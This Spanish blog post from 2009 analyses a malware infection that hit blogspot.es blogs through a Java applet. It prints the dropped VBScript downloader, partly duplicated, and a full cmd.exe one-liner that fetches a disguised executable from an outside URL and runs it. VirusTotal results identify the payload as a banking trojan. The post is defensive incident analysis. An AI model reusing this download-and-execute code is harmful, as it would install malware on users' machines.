El pasado viernes 16 de octubre por la mañana, me encontré con una sorpresa al acceder a este mismo blog que estáis leyendo, a nuestro queridísimo blog http://unlugarsinfin.blogspot.es.
De repente, un mensaje me solicitaba confiar en la ejecución de un applet firmado por www.eternalcog.org.
Evidentemente, no se trataba de ninguna funcionalidad nueva de nuestro servidor de hosting gratuito, pues el firmante se trataba, nada más y nada menos, de
Viendo el código fuente de la página, en seguida te percatabas de lo ocurrido...
En el apartado ‘Acerca de’ presente en la columna de la izquierda de nuestro blog, presente en todas las plantillas de blogspot.es y por tanto presente en todos los blogs de blogspot.es, nos encontramos con el siguiente código:
Un lugar sin fin
¡Se trataba pues de una infección mediante Java Applet (y VBScript) que afectaba a todos los blogs de blogspot.es!.
Para corroborarlo (bueno sí, y por curiosidad), decidí ahondar más en la infección.
Normalmente, en este tipo de infecciones, mediante la ejecución de un Applet en Java y un script en VBScript o Batch, es posible descargar y ejecutar un programa remoto en un pc tan sólo con un click. Basta decir que se confía en el applet que se intenta ejecutar.
Pues bien, en un entorno mega-virtual (sandbox) para pruebas y demás (tengo que quedar bien, claro ;-)) aceptamos confiar en el applet y observamos los resultados.
La primera impresión fue la siguiente:
Efectivamente, el applet creaba un VBScript en la ruta de instalación de mi Firefox con el siguiente contenido:
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim BinaryStream
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
Dim BinaryStream
Dim BinaryStream
BinaryStream.Type = adTypeBinary
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Open
BinaryStream.Open
BinaryStream.Write BinaryGetURL(Wscript.Arguments(0))
BinaryStream.Write BinaryGetURL(Wscript.Arguments(0))
BinaryStream.Open
BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite
Function BinaryGetURL(URL)
Dim Http
Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")
Http.Open "GET", URL, False
Http.Send
BinaryGetURL = Http.ResponseBody
End Function
Set shell = CreateObject("WScript.Shell")
shell.Run "xxx.exe"
y, a través del mismo, intentaba descargar y ejecutar el siguiente fichero http://www.discounttart.co.uk/newsletter/adobe.jpg renombrado a ‘xxx.exe’.
Veámoslo más en detalle a través de los comandos y procesos que lanzaba el applet:
Y a continuación, vemos las propiedades de uno de ellos:
Lo tenemos. El comando que ejecutaba el applet es el siguiente:
cmd.exe /c echo Const adTypeBinary = 1 > poq.vbs & echo Const adSaveCreateOverWrite = 2 >> poq.vbs & echo Dim BinaryStream >> poq.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> poq.vbs & echo BinaryStream.Type = adTypeBinary >> poq.vbs & echo BinaryStream.Open >> poq.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> poq.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> poq.vbs & echo Function BinaryGetURL(URL) >> poq.vbs & echo Dim Http >> poq.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> poq.vbs & echo Http.Open "GET", URL, False >> poq.vbs & echo Http.Send >> poq.vbs & echo BinaryGetURL = Http.ResponseBody >> poq.vbs & echo End Function >> poq.vbs & echo Set shell = CreateObject("WScript.Shell") >> poq.vbs & echo shell.Run "xxx.exe" >> poq.vbs & start poq.vbs http://www.discounttart.co.uk/newsletter/adobe.jpg xxx.exe
A estas alturas, ya sabemos de que se trataba la infección: llamaba y ejecutaba un applet desde una web externa (al parecer también comprometida) y se descargaba y ejecutaba un fichero de otra:
Pero ¿qué hace ese fichero adobe.jpg? ¿Qué tipo de malware conlleva?
Subimos el fichero adobe.jpg a Virustotal y salimos de dudas: se trata de un troyano que intenta robar información relacionada con las transacciones comerciales y bancarias del usuario infectado, el Trojan-Spy.Win32.Banker, que además y como podemos ver abajo, tiene un bajo índice de detecciones por la mayoría de motores de antivirus.
En resumen, hemos sido principales testigos de una infección que ha podido afectar y comprometer a miles de usuarios. Por mi parte, intenté avisar a los administradores de blogspot.es y, si bien han solucionado el problema, todavía no he recibido contestación alguna (ni creo que la reciba, con todo el lío que han tenido que
tener).
Daré más datos siempre que reciba más información y la seguridad y ética me lo permitan ;-)
Análisis del archivo adobe.jpg recibido el 2009.10.19 15:08:42 (UTC)
Resultado: 7/40 (17.5%)
Motor antivirus | Versión | Última actualización | Resultado |
a-squared | 4.5.0.41 | 2009.10.19 | Trojan-Spy.Win32.Banker.ARQ!IK |
AhnLab-V3 | 5.0.0.2 | 2009.10.19 | - |
AntiVir | 7.9.1.35 | 2009.10.19 | - |
Antiy-AVL | 2.0.3.7 | 2009.10.19 | - |
Authentium | 5.1.2.4 | 2009.10.19 | - |
Avast | 4.8.1351.0 | 2009.10.18 | - |
AVG | 8.5.0.420 | 2009.10.19 | - |
BitDefender | 7.2 | 2009.10.19 | Gen:Trojan.Heur.jm0@sTnLSqnib |
CAT-QuickHeal | 10.00 | 2009.10.18 | - |
ClamAV | 0.94.1 | 2009.10.19 | - |
Comodo | 2657 | 2009.10.19 | - |
DrWeb | 5.0.0.12182 | 2009.10.19 | - |
eSafe | 7.0.17.0 | 2009.10.19 | - |
eTrust-Vet | 35.1.7074 | 2009.10.19 | - |
F-Prot | 4.5.1.85 | 2009.10.18 | - |
F-Secure | 9.0.15300.0 | 2009.10.16 | Gen:Trojan.Heur.jm0@sTnLSqnib |
Fortinet | 3.120.0.0 | 2009.10.19 | - |
GData | 19 | 2009.10.19 | Gen:Trojan.Heur.jm0@sTnLSqnib |
Ikarus | T3.1.1.72.0 | 2009.10.19 | Trojan-Spy.Win32.Banker.ARQ |
Jiangmin | 11.0.800 | 2009.10.19 | - |
K7AntiVirus | 7.10.874 | 2009.10.19 | - |
Kaspersky | 7.0.0.125 | 2009.10.19 | - |
McAfee | 5775 | 2009.10.18 | - |
McAfee+Artemis | 5775 | 2009.10.18 | - |
McAfee-GW-Edition | 6.8.5 | 2009.10.19 | - |
Microsoft | 1.5101 | 2009.10.19 | - |
NOD32 | 4522 | 2009.10.19 | - |
Norman | 6.03.02 | 2009.10.19 | W32/Obfuscated.H2!genr |
nProtect | 2009.1.8.0 | 2009.10.19 | - |
Panda | 10.0.2.2 | 2009.10.18 | Suspicious file |
Prevx | 3.0 | 2009.10.19 | - |
Rising | 21.52.04.00 | 2009.10.19 | - |
Sophos | 4.46.0 | 2009.10.19 | - |
Sunbelt | 3.2.1858.2 | 2009.10.18 | - |
Symantec | 1.4.4.12 | 2009.10.19 | - |
TheHacker | 6.5.0.2.047 | 2009.10.19 | - |
TrendMicro | 8.950.0.1094 | 2009.10.19 | - |
VBA32 | 3.12.10.11 | 2009.10.18 | - |
ViRobot | 2009.10.19.1993 | 2009.10.19 | - |
VirusBuster | 4.6.5.0 | 2009.10.19 | - |
Información adicional |
Tamano archivo: 147456 bytes |
MD5...: 3afcb4180f095a4e173c31eae957865e |
SHA1..: 501e9c3961f290f35ce67128c2b4e6b6486d3286 |
SHA256: 50da17057b780bc7b78a5d8588c55412b7ea4323bd5a0b264fb6e5552315ef16 |
ssdeep: 3072:tjNuE+Yj+LqwWh3aOxyrwG9XhVRG1uWB8xOU75xKsAd:tXOWh3aOxysG9Xh |
PEiD..: - |
PEInfo: PE Structure information |
RDS...: NSRL Reference Data Set |
pdfid.: - |
trid..: Win32 Executable Microsoft Visual Basic 6 (86.2%) |
sigcheck: |
Extraído de http://unlugarsinfin.blogspot.es
Comentarios
Publicar un comentario